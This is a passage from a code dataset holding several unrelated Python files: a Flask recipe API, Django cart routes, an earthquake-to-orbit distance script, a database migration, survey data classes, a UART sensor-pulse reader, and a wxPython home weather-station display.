recipe_id=recipe)\n user_patient_recipe.save_to_db()\n\n return {\"message\": \"Recipe created successfully\"}\n\n\nclass SearchRecipeById(Resource):\n @classmethod\n def get(cls, id):\n recipe = RecipeModel.find_by_id(_id=id)\n if not recipe:\n return {\"message\": \"No recipe Fount\"}, 400\n return recipe.json(), 200\n\n\nclass RecipeSpend(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument(\n \"recipe_id\", type=int, required=True, help=\"this field is required\"\n )\n parser.add_argument(\n \"drugs\",\n action='append',\n )\n\n @classmethod\n @jwt_required\n def post(cls):\n data = cls.parser.parse_args()\n details = []\n for item in data.drugs:\n x = item.replace(\"'\", '\"')\n var = json.loads(x)\n drug_id = var['drug_id']\n drug = DrugModel.find_by_id(drug_id)\n\n discount = (var['dose'] * var['duration'] * var['unit']) / (drug.unit)\n information = {\n \"drug_name\": drug.name,\n \"quantity\": math.ceil(discount)\n }\n details.append(information)\n db.session.commit()\n\n if (drug.quantity - discount) > 0:\n current_user_id = get_jwt_identity()\n spend_recipe = RecipeSpendAssos(user_id=current_user_id, recipe_id=data.recipe_id)\n db.session.add(spend_recipe)\n db.session.commit()\n drug.quantity = (drug.quantity - math.ceil((discount)))\n db.session.commit()\n\n\n else:\n stockDrugs = []\n stockDrugs.append(drug)\n return {\n \"message\": \"Not enough quantity of this drug\",\n \"data\": [],\n \"drug\": [drug.json() for drug in stockDrugs]\n\n }, 404\n return {\"message\": \"Recipe Spend successful\",\n \"data\": details\n }\n","sub_path":"resources/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"653792659","text":"\nfrom django.conf.urls import url\nfrom .views import cart_home, cart_update, checkout_home, checkout_done_view, payment_done\n\nurlpatterns = [\n\n url(r'^$',cart_home,name='home'),\n url(r'^checkout/$', checkout_home, name='checkout'),\n url(r'^process/$', checkout_done_view, name='process'), \n url(r'^success/$', payment_done, name='success'), \n url(r'^update/$', cart_update, name='update'),\n]\n\n","sub_path":"src code/src/carts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"428171925","text":"# -*- coding: utf-8 -*-\n# distance_for_each_data_point.py\n################################################################\n################################################################\n#Python script to calculate the distance between data point and\n#the epicenter.\n#The distance is calculated with Hubeny formula.\n#===============================================================\n#Explanation of each object:\n#---------------------------------------------------------------\n#t1 :an object which contains starting time.\n#R1 :an object which contains the long radius of the\n# Earth.\n#R2 :an object which contains the short radius of the\n# Earth.\n#e1 :an object which contains the eccentricity of the\n# Earth.\n#pickupUSGSdata :a data frame object which contains the input\n# earthquake and orbit number data.\n#num1 :an object which contains the number of the orbit.\n#long1 :an object which contains the longitude of the\n# earthquake.\n#lat1 :an object which contains the latitude of the\n# earthquake.\n#occur_time :an object which contains the time when the\n# earthquake occurred.\n#filename :an object which contains the name of the file\n# where orbit data is preserved.\n#df1 :a data frame object which contains the input\n# orbit data.\n#list_dis :a list object which will contain the distance\n# for each orbit.\n#ido1 :an object which contains the latitude of the\n# epicenters with the radian notation\n#keido1 :an object which contains the longitude of the\n# epicenters with the radian notation\n#ido2 :an object which contains the latitude of the\n# orbits with the radian notation\n#keido2 :an object which contains the longitude of the\n# orbits with the radian notation\n#dif_ido :an object which contains the difference between\n# latitude of the epicenter and the latitude of\n# the orbit.\n#dif_keido :an object which contains the difference between\n# the longitude of the epicenter and the longitude\n# of the orbit.\n#myu_y :an object which contains the average of the\n# latitude of the epicenter and the latitude\n# of the orbit.\n#W1, M1, N1 :objects which are necessary to calculate\n# the distance.\n#dist :an object which contains the distance between\n# the epicenter and the orbit.\n#output_name :an object which contains the name of the output\n# file.\n#t2 :an object which contains finishing time.\n#elapsed_time :an object which contains elapsed time.\n#***************************************************************\n#Structure of this \"distance_for_each_data_point.py\" script:\n#---------------------------------------------------------------\n#\n#[1. Importing modules]\n#1-1. Importing pandas, time and math modules.\n#\n#\n#[2. measuring execution time]\n#2-1. measuring starting time with time module\n#\n#\n#[3. Setting parameters.]\n#3-1. Setting the long radius of the Earth.\n#3-2. Setting the short radius of the Earth.\n#3-3. Calculating the eccentricity of the Earth.\n#\n#\n#[4. Importing earthquake and orbit data.]\n#4-1. Importing earthquake and orbit data from a csv file.\n#4-2. Resetting the index number.\n#\n#\n#[5. Calculating the distance for each data point.]\n#5-1. Extracting the orbit number.\n#5-2. Extracting the longitude.\n#5-3. Extracting the latitude.\n#5-4. Extracting the time when the earthquake occurred.\n#5-5. Setting the file name using the orbit number and the\n# time extracted above.\n#5-6. Importing a file for the orbit data.\n#5-7. Making a list object which will contain the distance\n# for each data point in the orbit.\n#5-8. Starting the calculation for all data points in the\n# orbit data.\n#5-9. Converting the latitude of the epicenters into the\n# radian notation.\n#5-10. Converting the longitude of the epicenters into the\n# radian notation.\n#5-11. Converting the latitude of the orbit into the radian\n# notation.\n#5-12. Converting the longitude of the orbit into the radian\n# notation.\n#5-13. Calculating the difference between the latitude of\n# the epicenter and the latitude of the orbit.\n#5-14. Calculating the difference between the longitude of\n# the epicenter and the longitude of the orbit.\n#5-15. Calculating the average of the latitude of the\n# epicenter and the latitude of the orbit.\n#5-16. Calculating several parameters which are necessary to\n# calculate the distance.\n#5-17. Calculating the distance between the epicenter and the\n# orbit in km using Hubeny formula.\n#5-18. Inserting the data into a list object.\n#\n#\n#[6. Exporting data as a csv format file]\n#6-1. Adding the distance data to the orbit data.\n#6-2. Adding the elapsed time data to the orbit data.\n#6-3. Deleting the list object used to add the distance data\n# to the orbit data.\n#6-4. Setting the file name to export the data.\n#6-5. Exporting the data frame object into a csv file.\n#6-6. Deleting the data frame object used to export the data.\n#\n#\n#[7. measuring execution time]\n#7-1. Measuring finishing time with time module.\n#7-2. Output elapsed time\n#\n################################################################\n#\n#[1. Importing modules]\n#1-1. Importing pandas, time and math modules.\n#\nimport pandas as pd\nimport time\nimport math\n#\n#\n#[2. measuring execution time]\n#2-1. measuring starting time with time module\n#\nt1 = time.time()\n#\n#\n#[3. Setting parameters.]\n#3-1. Setting the long radius of the Earth.\n#\nR1 = 6378137\n#\n#3-2. Setting the short radius of the Earth.\n#\nR2 = 6356752.314\n#\n#3-3. Calculating the eccentricity of the Earth.\n#\ne1 = math.sqrt((R1*R1 - R2*R2)/(R1*R1))\n#\n#\n#[4. Importing earthquake and orbit data.]\n#4-1. Importing earthquake and orbit data from a csv file.\n#\npickupUSGSdata = pd.read_csv(\"pickupUSGSdata.csv\", index_col = 0)\n#\n#4-2. Resetting the index number.\n#\npickupUSGSdata.reset_index(drop=True, inplace = True)\n#\n#\n#[5. Calculating the distance for each data point.]\n#\nfor i in range(len(pickupUSGSdata)):\n#\n#5-1. Extracting the orbit number.\n#\n num1 = pickupUSGSdata.iloc[i,10]\n#\n#5-2. Extracting the longitude.\n#\n long1 = pickupUSGSdata.iloc[i,3]\n#\n#5-3. Extracting the latitude.\n#\n lat1 = pickupUSGSdata.iloc[i,4]\n#\n#5-4. Extracting the time when the earthquake occurred.\n#\n occur_time = pickupUSGSdata.iloc[i,0]\n#\n#5-5. Setting the file name using the orbit number and the\n# time extracted above.\n#\n filename = \".\\\\normalized_quake_orbit\\\\normalized_intensity_for_orbit\"+str(int(num1))+\"_quaketime_\"+str(occur_time)+\".csv\"\n#\n#5-6. Importing a file for the orbit data.\n#\n df1 = pd.read_csv(filename,index_col = 0)\n#\n#5-7. Making a list object which will contain the distance\n# for each data point in the orbit.\n#\n list_dist = []\n#\n#5-8. Starting the calculation for all data points in the\n# orbit data.\n#\n for kk in range(len(df1)):\n#\n#5-9. Converting the latitude of the epicenters into the\n# radian notation.\n#\n ido1 = lat1*math.pi/180\n#\n#5-10. Converting the longitude of the epicenters into the\n# radian notation.\n#\n keido1 = long1*math.pi/180\n#\n#5-11. Converting the latitude of the orbit into the radian\n# notation.\n#\n ido2 = df1.iloc[kk,3]*math.pi/180\n#\n#5-12. Converting the longitude of the orbit into the radian\n# notation.\n#\n keido2 = df1.iloc[kk,4]*math.pi/180\n#\n#5-13. Calculating the difference between the latitude of\n# the epicenter and the latitude of the orbit.\n#\n dif_ido = ido2-ido1\n#\n#5-14. Calculating the difference between the longitude of\n# the epicenter and the longitude of the orbit.\n#\n dif_keido = keido2-keido1\n if dif_keido>math.pi:\n dif_keido = 2*math.pi-dif_keido\n#\n#5-15. Calculating the average of the latitude of the\n# epicenter and the latitude of the orbit.\n#\n myu_y = (ido1+ido2)/2\n#\n#5-16. Calculating several parameters which are necessary to\n# calculate the distance.\n#\n W1 = math.sqrt((1-e1*e1*math.sin(myu_y)*math.sin(myu_y)))\n M1 = 6334832.10663254/(W1*W1*W1)\n N1 = 6377397.155/W1\n#\n#5-17. Calculating the distance between the epicenter and the\n# orbit in km using Hubeny formula.\n#\n dist = math.sqrt(dif_ido*dif_ido*M1*M1+dif_keido*dif_keido*N1*N1*math.cos(myu_y)*math.cos(myu_y))\n dist = dist/1000\n#\n#5-18. Inserting the data into a list object.\n#\n list_dist.append(dist)\n#\n#\n#[6. Exporting data as a csv format file]\n#6-1. Adding the distance data to the orbit data.\n#\n df1[\"distance\"] = list_dist\n#\n#6-2. Adding the elapsed time data to the orbit data.\n#\n df1[\"elapsed_time\"] = list(np.arange(0, len(df1)*2, 2))\n#\n#6-3. Deleting the list object used to add the distance data\n# to the orbit data.\n#\n del list_dist\n#\n#6-4. Setting the file name to export the data.\n#\n output_name = filename.replace(\".\\\\normalized_quake_orbit\\\\normalized\",\"distance_normalized\")\n#\n#6-5. Exporting the data frame object into a csv file.\n#\n df1.to_csv(output_name)\n#\n#6-6. Deleting the data frame object used to export the data.\n#\n del df1\n#\n#\n#[7. measuring execution time]\n#7-1. Measuring finishing time with time module.\n#\nt2 = time.time()\nelapsed_time = t2-t1\nelapsed_time = round(elapsed_time,3)\n#\n#7-2. Output elapsed time\n#\nprint(\"elapsed time = \", elapsed_time, \"sec and in hour, \",elapsed_time/3600)\n#\n################################################################\n","sub_path":"9_moving_average/1./stacking_ver1.py","file_name":"stacking_ver1.py","file_ext":"py","file_size_in_byte":9711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"55212559","text":"from opengever.base.oguid import Oguid\nfrom opengever.core.upgrade import SchemaMigration\nfrom sqlalchemy.sql import select\nfrom sqlalchemy.sql.expression import column\nfrom sqlalchemy.sql.expression import table\n\n\nproposal_table = table(\n \"proposals\",\n column(\"id\"),\n column(\"admin_unit_id\"),\n column(\"int_id\"),\n column(\"submitted_admin_unit_id\"),\n column(\"submitted_int_id\"),\n column(\"title\"),\n column(\"legal_basis\"),\n column(\"initial_position\"),\n column(\"proposed_action\"),\n column(\"considerations\"),\n column(\"decision_draft\"),\n column(\"publish_in\"),\n column(\"disclose_to\"),\n column(\"copy_for_attention\"),\n)\n\n\nPROPOSAL_FIELDS = (\n 'title',\n 'legal_basis',\n 'initial_position',\n 'proposed_action',\n 'decision_draft',\n 'publish_in',\n 'disclose_to',\n 'copy_for_attention',\n)\n\nSUBMITTED_PROPOSAL_FIELDS = PROPOSAL_FIELDS + ('considerations',)\n\n\nclass MoveProposalFieldsToPloneObjects(SchemaMigration):\n \"\"\"Move proposal fields to plone objects.\n \"\"\"\n\n def migrate(self):\n self.migrate_data()\n self.drop_sql_columns()\n\n def has_proposals_for_multiple_admin_units(self):\n statement = select([proposal_table.c.admin_unit_id]).distinct()\n results = list(self.execute(statement))\n return len(results) > 1\n\n def migrate_data(self):\n proposals = self.execute(proposal_table.select()).fetchall()\n if proposals:\n msg = 'data migration supports only one admin-unit!'\n assert not self.has_proposals_for_multiple_admin_units(), msg\n\n for proposal in proposals:\n self.migrate_proposal_fields_to_plone_objects(proposal)\n\n def migrate_proposal_fields_to_plone_objects(self, sql_proposal):\n oguid = Oguid(sql_proposal.admin_unit_id, sql_proposal.int_id)\n proposal = oguid.resolve_object()\n for field_name in PROPOSAL_FIELDS:\n setattr(proposal, field_name, getattr(sql_proposal, field_name))\n\n submitted_oguid = Oguid(sql_proposal.submitted_admin_unit_id,\n sql_proposal.submitted_int_id)\n submitted_proposal = submitted_oguid.resolve_object()\n if not submitted_proposal:\n return\n\n for field_name in SUBMITTED_PROPOSAL_FIELDS:\n setattr(submitted_proposal, field_name,\n getattr(sql_proposal, field_name))\n\n def drop_sql_columns(self):\n for column_name in SUBMITTED_PROPOSAL_FIELDS:\n self.op.drop_column(\"proposals\", column_name)\n","sub_path":"opengever/core/upgrades/20170619120631_move_proposal_fields_to_plone_object/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"372617576","text":"# This class has common Surveying attributes used by many Survey Codes\n# when collecting data The class Functions will operate on all of the\n# common attributes instance variables for most all survey code choices\n# since most all of them share these same attributes.\nimport ChoicesAndTypes\nfrom mongoengine import *\n# Initiating the connection\n# connect('mydb')\n\n\nclass CommonAttributes(Document):\n gps_point = IntField(required=True, unique=True, min_value=0)\n cover = FloatField(required=True, min_value=0.0)\n ngc = IntField(required=True, min_value=0)\n notes = StringField(required=True)\n meta = {'allow_inheritance': True}\n\n\ndef collect_gps_point():\n \"\"\"\n This method collects the current GPS Point or Shot number for the\n Feature being collected. It catches any words or decimal value\n numbers that are input and throws an error for such. It will only\n accept whole numbers.\n \"\"\"\n while True:\n try:\n gps_point = int(input(\"Enter the GPS Point for this Feature: \"))\n except ValueError:\n print(ChoicesAndTypes.value_error + \" Whole numbers only. No\"\n \" words or decimals.\")\n else:\n break\n\n\ndef collect_cover():\n \"\"\"\n This method collects the cover for a survey feature that was\n collected. It catches any words or whole numbers and will accept\n only decimal values.\n \"\"\"\n while True:\n try:\n cover = float(input(\"Enter the Cover for this Feature: \"))\n except ValueError:\n print(ChoicesAndTypes.value_error + \" Decimal numbers only. No\"\n \" words or whole numbers.\")\n else:\n break\n\n\ndef collect_ngc():\n \"\"\"\n This method collects the current GPS Point Natural Ground for Cover\n for the Feature being collected. It catches any words or decimal\n value numbers that are input and throws an error for such. It will\n only accept whole numbers.\n \"\"\"\n while True:\n try:\n ngc = int(input(\"Enter the Natural Ground Shot for Cover for\"\n \" this Feature: \"))\n except ValueError:\n print(ChoicesAndTypes.value_error + \" Whole numbers only. No\"\n \" words or decimals.\")\n else:\n break\n\n\ndef collect_notes():\n \"\"\"\n This method collects any notes that may need to be noted for the\n collected survey feature.\n \"\"\"\n notes = str(input(\"Notes: \"))\n return notes\n","sub_path":"SurveyCodesAttributes.py","file_name":"SurveyCodesAttributes.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"384699891","text":"#!/usr/bin/env python3\n# import pyftdi.serialext\nimport struct\nimport serial\n\nfrom pulseDecoder import PulseDecoder\n\nimport sys\n\nTIMER_FREQUENCY = 48e6\n\npulseDecoders = [PulseDecoder()] * 8\n\nif len(sys.argv) > 1:\n port = open(sys.argv[1], \"rb\")\nelse:\n # port = pyftdi.serialext.serial_for_url('ftdi://ftdi:2232h/2', baudrate=230400)\n port = serial.Serial(\"/dev/ttyUSB1\", 230400)\n\nprint(\"Waiting for sync ....\")\nbuffer = [0] * 7\nsync = False\nwhile not sync:\n data = port.read(1)\n buffer = [data[0]] + buffer[:6]\n sync = all(b != 0 for b in buffer)\n\nprint(\"Reading pulses ...\")\n\nwhile True:\n data = port.read(7)\n if len(data) < 7:\n break\n if data[-1] != 0:\n # print(\"Sync!\")\n continue\n data = data[:-1]\n timestamp, length = struct.unpack(\"> 29\n timestamp = timestamp & 0x1FFFFFFF\n\n decoded = pulseDecoders[sensor_id].processPulse(timestamp, length/TIMER_FREQUENCY)\n\n # if decoded['pulseType'] == 'sweep':\n # typestr = \"sweep\"\n # else:\n # typestr = \"sync {}\".format(decoded['sync'])\n\n # print(\"{} - TS: 0x{:08x}, Length: {:4d}, δ: {:7.3f}ms -- {}\".format(\n # sensor_id, timestamp, length, 0, typestr))\n\n if 'baseStationInfo' in decoded:\n print(\"Decoded baseStationInfo data frame:\", decoded['baseStationInfo'])\n # sys.exit(0)\n\n # if 'angleMeasurement' in decoded:\n # print(\"{} - Angle measured:\".format(sensor_id), decoded['angleMeasurement'])\n\n # print(\"{}: {:8x} {:4x}\".format(sensor_id, timestamp, length))\n\n\nport.close()","sub_path":"tools/readUartPulses.py","file_name":"readUartPulses.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"285045549","text":"# coding=utf-8\n\"\"\"\nDisplay weather data from local 1-wire and internet-sources, drive remote controlled sockets.\nDesigned for BeagleBone Black and BB-View\n\"\"\"\nimport os\nimport re\nfrom urllib import urlopen\n# noinspection PyProtectedMember\nfrom wxPython._core import wxImageFromStream\nimport logging\nfrom StringIO import StringIO\nimport matplotlib\nfrom matplotlib.ticker import MaxNLocator\nfrom mydatabase import MyDatabase\n\n__author__ = 'xenobyter'\n\nimport time\nimport wx\n\nfrom MainFrame import MainFrame\nfrom PressureFrame import PressureFrame\nfrom TemperatureFrame import TemperatureFrame\nfrom SocketFrame import SocketFrame\nfrom internetweather import InternetWeather\nfrom sensors import MyBMP085, Dallas\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\n\n\nclass MyMainFrame(MainFrame):\n \"\"\"\n Derive MainFrame to implement handlers.\n \"\"\"\n\n def __init__(self, *args, **kwds):\n super(MyMainFrame, self).__init__(*args, **kwds)\n\n # register and start clock\n self.clock_timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self.clock_update, self.clock_timer)\n self.clock_timer.Start(1000)\n\n # register and start update for weather\n self.weather_update(None)\n self.weather_timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self.weather_update, self.weather_timer)\n self.weather_timer.Start(1800000)\n\n # register and start updates for BMP085\n self.sensors_timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self.sensors_update, self.sensors_timer)\n self.sensors_timer.Start(60000)\n\n # register and start task to compact database\n self.db_compact(None)\n self.db_compact_timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self.db_compact, self.db_compact_timer)\n self.db_compact_timer.Start(86400000)\n\n # noinspection PyUnusedLocal\n @staticmethod\n def db_compact(event):\n \"\"\"Call compact on the main table\n\n :param event: unused\n \"\"\"\n db = MyDatabase()\n db.compact()\n db.close()\n\n # noinspection PyUnusedLocal\n def clock_update(self, event):\n \"\"\"\n Update time and date to MyMainFrame.\n :param event:\n \"\"\"\n self.label_time.SetLabel(time.strftime(\"%d.%m.%Y %H:%M:%S\"))\n\n # noinspection PyUnusedLocal\n def weather_update(self, event):\n \"\"\"\n Gets a dictionary with the weather from xbInternetWeather and displays the data to MyMainFrame.\n :param event:\n\n \"\"\"\n my_weather = InternetWeather()\n my_weather_dict = my_weather.get_weather('12831619')\n logging.debug(my_weather_dict)\n\n self.label_condition.SetLabel(my_weather_dict['condition_text'])\n self.label_inet_temp.SetLabel(my_weather_dict['condition_temp'] + u'°C')\n self.label_felt_temp.SetLabel(my_weather_dict['wind_chill'] + u'°C')\n self.label_high_temp.SetLabel(my_weather_dict['forecast0_high'] + u'°C')\n self.label_low_temp.SetLabel(my_weather_dict['forecast0_low'] + u'°C')\n str_wind_dir = 'N'\n int_wind_dir = int(my_weather_dict['wind_direction'])\n logging.debug(\"weather_update: wind dir \" + my_weather_dict['wind_direction'])\n if int_wind_dir in range(23, 68):\n str_wind_dir = 'NO'\n if int_wind_dir in range(69, 114):\n str_wind_dir = 'O'\n if int_wind_dir in range(115, 160):\n str_wind_dir = 'SO'\n if int_wind_dir in range(161, 206):\n str_wind_dir = 'S'\n if int_wind_dir in range(207, 252):\n str_wind_dir = 'SW'\n if int_wind_dir in range(253, 298):\n str_wind_dir = 'W'\n if int_wind_dir in range(299, 344):\n str_wind_dir = 'NW'\n self.label_wind.SetLabel(my_weather_dict['wind_speed'].split('.')[0] + \"km/h aus \" + str_wind_dir)\n self.label_humidity.SetLabel(my_weather_dict['atmosphere_humidity'] + '%')\n\n # get the bitmaps from the urls\n img = wxImageFromStream(StringIO(urlopen(my_weather_dict['condition_url']).read()))\n self.bitmap_condition.SetBitmap(wx.BitmapFromImage(img))\n\n # forecast0\n self.label_forecast0_day.SetLabel(my_weather_dict['forecast0_day'])\n self.label_forecast0_low.SetLabel(my_weather_dict['forecast0_low'] + u'°C')\n self.label_forecast0_high.SetLabel(my_weather_dict['forecast0_high'] + u'°C')\n img = wxImageFromStream(StringIO(urlopen(my_weather_dict['forecast0_url']).read()))\n self.bitmap_condition_0.SetBitmap(wx.BitmapFromImage(img))\n self.bitmap_condition_0.SetToolTipString(my_weather_dict['forecast0_text'])\n\n # forecast1\n self.label_forecast1_day.SetLabel(my_weather_dict['forecast1_day'])\n self.label_forecast1_low.SetLabel(my_weather_dict['forecast1_low'] + u'°C')\n self.label_forecast1_high.SetLabel(my_weather_dict['forecast1_high'] + u'°C')\n img = wxImageFromStream(StringIO(urlopen(my_weather_dict['forecast1_url']).read()))\n self.bitmap_condition_1.SetBitmap(wx.BitmapFromImage(img))\n self.bitmap_condition_1.SetToolTipString(my_weather_dict['forecast1_text'])\n\n # forecast2\n self.label_forecast2_day.SetLabel(my_weather_dict['forecast2_day'])\n self.label_forecast2_low.SetLabel(my_weather_dict['forecast2_low'] + u'°C')\n self.label_forecast2_high.SetLabel(my_weather_dict['forecast2_high'] + u'°C')\n img = wxImageFromStream(StringIO(urlopen(my_weather_dict['forecast2_url']).read()))\n self.bitmap_condition_2.SetBitmap(wx.BitmapFromImage(img))\n self.bitmap_condition_2.SetToolTipString(my_weather_dict['forecast2_text'])\n\n # forecast3\n self.label_forecast3_day.SetLabel(my_weather_dict['forecast3_day'])\n self.label_forecast3_low.SetLabel(my_weather_dict['forecast3_low'] + u'°C')\n self.label_forecast3_high.SetLabel(my_weather_dict['forecast3_high'] + u'°C')\n img = wxImageFromStream(StringIO(urlopen(my_weather_dict['forecast3_url']).read()))\n self.bitmap_condition_3.SetBitmap(wx.BitmapFromImage(img))\n self.bitmap_condition_3.SetToolTipString(my_weather_dict['forecast3_text'])\n\n # forecast4\n self.label_forecast4_day.SetLabel(my_weather_dict['forecast4_day'])\n self.label_forecast4_low.SetLabel(my_weather_dict['forecast4_low'] + u'°C')\n self.label_forecast4_high.SetLabel(my_weather_dict['forecast4_high'] + u'°C')\n img = wxImageFromStream(StringIO(urlopen(my_weather_dict['forecast4_url']).read()))\n self.bitmap_condition_4.SetBitmap(wx.BitmapFromImage(img))\n self.bitmap_condition_4.SetToolTipString(my_weather_dict['forecast4_text'])\n\n # noinspection PyUnusedLocal\n def sensors_update(self, event):\n \"\"\"make sure we write all sensors data to db\n :param event: unused\n \"\"\"\n\n bmp085 = MyBMP085()\n dallas = Dallas()\n\n # read data from bmp085\n bmp085_data = bmp085.get_bmp085()\n logging.debug('BMP05: ' + str(bmp085_data))\n\n # try to read dallas-data\n dallas_data = dallas.get_dallas()\n logging.debug('Dallas: ' + str(dallas_data))\n try:\n t = dallas_data['28-00000465db0c']\n str_t = '{:0.1f}'.format(t)\n self.label_inet_temp.SetLabel(str_t + u'°C')\n except KeyError:\n logging.error('No Data from outdoor sensor')\n\n def OnPressure(self, event):\n \"\"\"Opens the pressure frame\n\n :param event: unused\n \"\"\"\n frame_pressure = MyPressureFrame(None, wx.ID_ANY, \"\")\n frame_pressure.Show()\n\n def OnTemperature(self, event):\n \"\"\"Opens the temperature frame\n\n :param event: unused\n \"\"\"\n frame_temperature = MyTemperatureFrame(None, wx.ID_ANY, \"\")\n frame_temperature.Show()\n\n def OnSocket(self, event):\n frame_socket = MySocketFrame(None, wx.ID_ANY, \"\")\n frame_socket.Show()\n\n\nclass MyPressureFrame(PressureFrame):\n \"\"\"\n Derive PressureFrame to implement handlers.\n \"\"\"\n\n def __init__(self, *args, **kwds):\n super(MyPressureFrame, self).__init__(*args, **kwds)\n self.figure = Figure()\n self.figure.set_size_inches(6.0375, 2.875)\n self.figure.set_facecolor('#d6d6d6')\n self.axes = self.figure.add_subplot(111)\n self.paint_diagram()\n\n def OnBack(self, event):\n \"\"\"Close the pressure frame\n :param event: unused\n \"\"\"\n self.Close()\n event.Skip()\n\n def OnToggleHistory(self, event):\n \"\"\"Start a repaint when button_toggle ist changed\n\n :param event: unused\n \"\"\"\n logging.debug('Toggle_button: ' + str(self.button_toggle.GetValue()))\n self.paint_diagram()\n\n def paint_diagram(self):\n \"\"\"Actually paint the graph\n \"\"\"\n db = MyDatabase()\n data = db.read_pressure(time.time() - 86400, self.button_toggle.GetValue())\n\n self.axes.clear()\n # Set title and X-Axis format depending on the state of button_toggle\n if self.button_toggle.GetValue():\n # noinspection PyUnresolvedReferences\n self.axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%d.%m'))\n self.axes.set_title('Historie')\n else:\n # noinspection PyUnresolvedReferences\n self.axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%H:%M'))\n self.axes.set_title('24h-Verlauf')\n\n # Adjust the font size of all ticks\n # noinspection PyUnresolvedReferences\n ticks_font = matplotlib.font_manager.FontProperties(size=10)\n for label in self.axes.get_xticklabels():\n label.set_fontproperties(ticks_font)\n for label in self.axes.get_yticklabels():\n label.set_fontproperties(ticks_font)\n\n # Set maximum number of ticks\n self.axes.xaxis.set_major_locator(MaxNLocator(9))\n\n # Finally plot it\n self.axes.set_ylabel('Luftdruck in hPa')\n logging.debug('Data: ' + str(len(data)))\n if data:\n self.axes.plot(data[0::2], data[1::2])\n self.axes.xaxis_date()\n self.panel_1 = FigureCanvas(self, -1, self.figure)\n\n\nclass MyTemperatureFrame(TemperatureFrame):\n \"\"\"\n Derive TemperatureFrame to implement handlers.\n \"\"\"\n\n def __init__(self, *args, **kwds):\n super(MyTemperatureFrame, self).__init__(*args, **kwds)\n self.figure = Figure()\n self.figure.set_size_inches(6.0375, 2.875)\n self.figure.set_facecolor('#d6d6d6')\n self.axes = self.figure.add_subplot(111)\n\n self.db = MyDatabase()\n # append all sensors to combobox\n for sensor in self.db.dallas_sensors():\n logging.debug(sensor[0])\n self.combo_box_sensor.Append(sensor[0])\n\n # read default sensors\n default_sensor = self.db.read_settings('default_dallas_sensor')\n\n # check, if we have the default in our combobox\n if default_sensor in self.combo_box_sensor.GetItems():\n self.combo_box_sensor.SetValue(default_sensor)\n else:\n # otherwise choose the first one\n self.combo_box_sensor.Select(0)\n\n self.paint_diagram()\n\n def OnBack(self, event):\n \"\"\"Close the pressure frame\n :param event: unused\n \"\"\"\n self.Close()\n event.Skip()\n\n def OnToggleHistory(self, event):\n \"\"\"Start a repaint when button_toggle ist changed\n\n :param event: unused\n \"\"\"\n logging.debug('Toggle_button: ' + str(self.button_toggle.GetValue()))\n self.paint_diagram()\n\n def OnCombo(self, event):\n \"\"\"Start a repaint when combobox changes\n\n :param event: unused\n \"\"\"\n logging.debug('ComboBox: ' + str(self.combo_box_sensor.GetValue()))\n self.db.write_settings('default_dallas_sensor', str(self.combo_box_sensor.GetValue()))\n self.paint_diagram()\n\n def paint_diagram(self):\n \"\"\"Actually paint the graph\n \"\"\"\n data = self.db.read_dallas(self.combo_box_sensor.GetValue(), time.time() - 86400, self.button_toggle.GetValue())\n\n self.axes.clear()\n # Set title and X-Axis format depending on the state of button_toggle\n if self.button_toggle.GetValue():\n # noinspection PyUnresolvedReferences\n self.axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%d.%m'))\n self.axes.set_title('Historie')\n else:\n # noinspection PyUnresolvedReferences\n self.axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%H:%M'))\n self.axes.set_title('24h-Verlauf')\n\n # Adjust the font size of all ticks\n # noinspection PyUnresolvedReferences\n ticks_font = matplotlib.font_manager.FontProperties(size=10)\n for label in self.axes.get_xticklabels():\n label.set_fontproperties(ticks_font)\n for label in self.axes.get_yticklabels():\n label.set_fontproperties(ticks_font)\n\n # Set maximum number of ticks\n self.axes.xaxis.set_major_locator(MaxNLocator(9))\n\n # Finally plot it\n self.axes.set_ylabel(u'Temperatur in °C')\n logging.debug('Data: ' + str(len(data)))\n if data:\n self.axes.plot(data[0::2], data[1::2])\n self.axes.xaxis_date()\n self.panel_1 = FigureCanvas(self, -1, self.figure)\n\n\nclass MySocketFrame(SocketFrame):\n def __init__(self, *args, **kwds):\n super(MySocketFrame, self).__init__(*args, **kwds)\n\n # fill socket states from time of day\n sockets = {}\n t = int(time.strftime('%H'))\n wd = int(time.strftime('%w'))\n if t >= 18:\n sockets['1111101000'] = '10'\n else:\n sockets['1111101000'] = '01'\n if 9 <= t < 21:\n sockets['1111110000'] = '10'\n else:\n sockets['1111110000'] = '01'\n if 6 <= t < 20:\n sockets['1111100100'] = '10'\n else:\n sockets['1111100100'] = '01'\n if 13 <= t < 23:\n sockets['1111100010'] = '01'\n else:\n sockets['1111100010'] = '10'\n if wd < 2 and 6 <= t < 13:\n sockets['1111100010'] = '01'\n\n # determine the current state from syslog\n logfile = open('/var/log/syslog', 'r')\n for line in logfile:\n if re.search('./rcswitch', line):\n logging.debug('SocketFrame: ' + line)\n position = line.index('./rcswitch') + 11\n sockets[line[position:position + 10]] = line[position + 10:position + 12]\n logfile.close()\n\n # set the buttons\n if sockets['1111101000'] == '10':\n self.button_bedroom.SetValue(True)\n if sockets['1111110000'] == '10':\n self.button_aquarium.SetValue(True)\n if sockets['1111100100'] == '10':\n self.button_kitchen.SetValue(True)\n if 